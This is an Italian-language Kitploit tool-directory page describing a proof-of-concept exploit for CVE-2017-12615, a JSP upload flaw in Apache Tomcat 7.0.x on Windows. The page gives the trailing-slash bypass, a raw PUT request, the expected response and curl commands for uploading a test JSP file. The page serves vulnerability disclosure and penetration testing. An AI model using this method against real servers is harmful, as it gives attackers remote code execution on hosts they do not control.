Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-12615 — Exploit POC per Apache Tomcat 7.0.x CVE-2017-12615 della vulnerabilità PUT JSP. | Kitploit
Strumenti/GitHubGitHub/breaktoprotect/cve-2017-12615
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Exploit POC per Apache Tomcat 7.0.x CVE-2017-12615 della vulnerabilità PUT JSP.

Vedi Repository
1122126 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

In memoria di Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC Exploit per Apache Tomcat 7.0.0 a 7.0.79 in esecuzione su Windows; vulnerabilità CVE-2017-12615 PUT JSP.

Descrizione:

Per progettazione, non è consentito caricare file JSP tramite il metodo PUT sui server Apache Tomcat. Questa è probabilmente una misura di sicurezza per impedire a un attaccante di caricare una shell JSP e ottenere l'esecuzione remota di codice sul server. Tuttavia, a causa di controlli insufficienti, un attaccante potrebbe ottenere l'esecuzione remota di codice sui server Tomcat 7.0.{0 to 79} che hanno abilitato PUT richiedendo il metodo PUT sul server Tomcat utilizzando una richiesta HTTP appositamente predisposta. Ma seriamente, speciale? Per favore.

Metodo di exploit:

Aggiungendo un carattere '/' dopo l'estensione del nome file, si può bypassare il controllo dell'estensione del file. Tutto qui. Quindi, in realtà non è così speciale.

Exploit in un metodo di richiesta:

Richiesta

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Risposta prevista in caso di successo

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit usando 'curl':

  1. Crea un file .jsp (ad esempio test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Esegui il comando curl sul server target:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Controlla se il tuo file è stato caricato navigando all'indirizzo target oppure:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
Scarica lo strumento